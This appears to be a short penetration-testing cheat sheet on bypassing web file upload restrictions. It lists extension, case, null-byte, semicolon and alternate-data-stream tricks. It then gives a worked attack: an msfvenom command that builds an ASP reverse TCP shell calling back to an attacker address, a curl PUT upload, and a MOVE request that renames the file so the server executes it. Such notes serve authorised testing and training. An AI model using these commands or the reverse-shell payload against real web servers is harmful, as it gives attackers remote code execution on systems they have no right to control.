Bypassing File Upload Restrictions
Common techniques to bypass File upload restrictions on web sites.
- Change the Content-Type parameter in the request header using Burp, ZAP etc.
- Put server executable extensions like file.php5, file.shtml, file.asa, file.cert
- Changing letters to capital form file.aSp or file.PHp3
- Using trailing spaces and/or dots at the end of the filename like file.asp… … . . .. .. , file.asp , file.asp.
- Use of semicolon after the forbidden extension and before the permitted extension example: file.asp;.jpg (Only in IIS 6 or prior)
- Upload a file with 2 extensions—> file.php.jpg
- Use of null character e.g file.asp%00.jpg
- Create a file with a forbidden extension e.g. file.asp:.jpg or file.asp::$data
When Both MOVE and PUT HTTP Methods is available
Create payload and rename to .txt:
1 2 |
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.187 LPORT=443 -f asp > shell443.asp |
Upload file via Curl and PUT Method:
1 2 |
curl -T shell443.txt http://10.11.1.229/ -v |
From ZAP or Burp rename/move the file to shell443.asp;.jpg where jpg is allowed:
MOVE http://10.11.1.229/shell443.txt HTTP/1.1
Accept: */ *
Destination: /shell443.asp;.jpg
Overwrite: F
Content-Length: 0
Host: 10.11.1.229